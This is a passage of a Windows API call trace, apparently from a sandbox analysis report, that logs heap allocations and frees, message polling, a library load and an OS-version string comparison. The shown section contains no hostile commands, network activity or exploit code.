lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0165.996] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.996] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0165.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0165.997] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0165.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0165.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0165.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0165.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.998] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0165.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0165.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.999] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.999] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0165.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.999] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0165.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0165.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0165.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0165.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0165.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0165.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0166.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0166.000] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0166.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0166.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0166.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0166.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0166.001] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0166.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0166.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0166.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0166.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0166.001] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0166.001] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0166.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0166.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0166.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0166.002] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.002] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0166.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0166.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0166.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0166.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0166.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0166.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0166.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0166.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0166.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.003] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0166.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0166.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0166.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0166.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0166.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0166.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0166.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0166.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0166.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0166.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0166.004] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0166.005] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0166.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0166.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0166.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0166.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0166.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0166.006] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0166.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0166.007] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0166.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0166.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0166.007] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0166.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0166.007] RtlAllocateHeap (HeapHandle=0x25c0000, 